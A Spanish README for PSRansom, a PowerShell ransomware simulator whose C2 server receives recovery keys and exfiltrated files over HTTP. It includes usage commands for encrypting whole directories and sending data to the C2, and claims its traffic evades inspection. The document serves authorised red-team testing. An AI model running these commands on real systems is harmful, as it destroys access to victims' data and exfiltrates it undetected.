
Simulador de ransomware en PowerShell con servidor C2

PSRansom es un simulador de ransomware en PowerShell con capacidades de servidor C2. Esta herramienta te ayuda a simular el proceso de cifrado de un ransomware genérico en cualquier sistema con PowerShell instalado. Gracias al servidor C2 integrado, puedes exfiltrar archivos y recibir información del cliente a través de HTTP.
Toda la comunicación entre los dos elementos está cifrada o codificada para pasar desapercibida por los mecanismos de inspección de tráfico, aunque en ningún momento se utiliza HTTPS.
Se recomienda clonar el repositorio completo o descargar el archivo zip. Puedes hacerlo ejecutando el siguiente comando:
git clone https://github.com/JoelGMSec/PSRansom
.\PSRansom -h
____ ____ ____
| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
Info: Esta herramienta te ayuda a simular el proceso de cifrado de un
ransomware genérico en PowerShell con capacidades C2
Uso: .\PSRansom.ps1 -e Directorio -s ServidorC2 -p PuertoC2
Cifra todos los archivos y envía la clave de recuperación al ServidorC2
Use -x para exfiltrar y descifrar archivos en el ServidorC2
.\PSRansom.ps1 -d Directorio -k ClaveRecuperacion
Descifra todos los archivos con la cadena de clave de recuperación
Advertencia: Toda la información se enviará al ServidorC2 sin ningún cifrado
Necesitas una clave de recuperación generada previamente para recuperar archivos
https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell
Este proyecto está licenciado bajo la licencia GNU 3.0 - consulte el archivo LICENSE para más detalles.
Esta herramienta ha sido creada y diseñada desde cero por Joel Gámez Molina // @JoelGMSec
Este software no ofrece ningún tipo de garantía. Su uso es exclusivo para entornos educativos y/o auditorías de seguridad con el consentimiento correspondiente del cliente. No me hago responsable de su uso indebido ni de cualquier posible daño causado por el mismo.
Para más información, puedes encontrarme en Twitter como @JoelGMSec y en mi blog darkbyte.net.
Puedes apoyar mi trabajo comprándome un café: